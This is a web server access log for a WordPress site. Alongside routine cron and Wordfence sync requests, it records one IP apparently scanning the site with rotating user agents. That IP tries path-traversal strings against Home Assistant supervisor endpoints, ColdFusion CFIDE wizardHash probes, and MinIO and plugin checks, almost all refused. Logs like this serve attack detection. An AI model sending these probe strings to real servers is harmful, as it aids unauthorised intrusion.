165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/125.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/122.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:05 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.9) Gecko/20100101 Firefox/128.9"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:23:07 +0800] "POST /?wordfence_syncAttackData=1768328587.5238 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:23:06 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
103.4.122.14 - - [14/Jan/2026:02:23:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768328589.6391119956970214843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:07 +0800] "POST /?wordfence_syncAttackData=1768328587.5249 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:07 +0800] "POST /?wordfence_syncAttackData=1768328587.5274 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:07 +0800] "POST /?wordfence_syncAttackData=1768328587.5387 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:11 +0800] "POST /?wordfence_syncAttackData=1768328591.1584 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:11 +0800] "POST /?wordfence_syncAttackData=1768328591.1489 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:11 +0800] "POST /?wordfence_syncAttackData=1768328591.2448 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:14 +0800] "POST /?wordfence_syncAttackData=1768328594.7377 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:14 +0800] "POST /?wordfence_syncAttackData=1768328594.7351 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:12 +0800] "POST /?wordfence_syncAttackData=1768328592.155 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:14 +0800] "POST /?wordfence_syncAttackData=1768328594.8248 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:23:15 +0800] "POST /?wordfence_syncAttackData=1768328595.8541 HTTP/1.1" 200 16322 "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:23:15 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [14/Jan/2026:02:23:15 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:15 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
165.232.54.158 - - [14/Jan/2026:02:23:16 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
165.232.54.158 - - [14/Jan/2026:02:23:17 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:17 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [14/Jan/2026:02:23:17 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.9) Gecko/20100101 Firefox/128.9"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [14/Jan/2026:02:23:18 +0800] "POST /?wordfence_syncAttackData=1768328598.2538 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [14/Jan/2026:02:23:18 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
165.232.54.158 - - [14/Jan/2026:02:23:19 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [14/Jan/2026:02:23:19 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:19 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:20 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [14/Jan/2026:02:23:27 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [14/Jan/2026:02:23:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768328610.2649989128112792968750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:23:27 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:27 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
165.232.54.158 - - [14/Jan/2026:02:23:28 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
165.232.54.158 - - [14/Jan/2026:02:23:31 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:31 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [14/Jan/2026:02:23:32 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [14/Jan/2026:02:23:31 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:33 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:33 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/119.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:33 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
165.232.54.158 - - [14/Jan/2026:02:23:34 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:34 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:34 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [14/Jan/2026:02:23:34 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:34 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:34 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:34 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.3 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:34 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:34 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [14/Jan/2026:02:23:45 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
165.232.54.158 - - [14/Jan/2026:02:23:45 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:45 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/119.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:46 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:46 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:46 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [14/Jan/2026:02:23:46 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:46 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:23:46 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:23:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768328632.8418331146240234375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:23:46 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [14/Jan/2026:02:23:46 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.3 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:23:46 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:24:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768328668.2107141017913818359375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:24:25 +0800] "GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:24:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768328677.1863100528717041015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:24:34 +0800] "GET /api/hassio/app/.%09./supervisor/info HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:24:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768328686.1688029766082763671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:24:43 +0800] "GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:27:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768328851.7073199748992919921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:27:28 +0800] "POST /index.php/management/set_timezone HTTP/1.1" 404 10868 "https://nutritaste.com.au/index.php/management/datetime" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:27:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768328857.2290380001068115234375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:27:34 +0800] "POST /minio/bootstrap/v1/verify HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.4) AppleWebKit/619.11 (KHTML, like Gecko) Version/17.3.56 Safari/619.11"
103.4.122.14 - - [14/Jan/2026:02:29:49 +0800] "POST /wp-cron.php?doing_wp_cron=1768328989.1179430484771728515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:29:47 +0800] "POST /?wordfence_syncAttackData=1768328987.5609 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:29:45 +0800] "GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [14/Jan/2026:02:29:50 +0800] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
165.232.54.158 - - [14/Jan/2026:02:29:57 +0800] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:30:04 +0800] "POST /cfusion/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:02:30:11 +0800] "POST //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [14/Jan/2026:02:30:18 +0800] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0"
103.4.122.14 - - [14/Jan/2026:02:32:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768329178.0551729202270507812500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:32:56 +0800] "POST /?wordfence_syncAttackData=1768329176.5307 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:32:54 +0800] "GET /users/sign_in HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:33:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768329204.6690189838409423828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:33:21 +0800] "POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
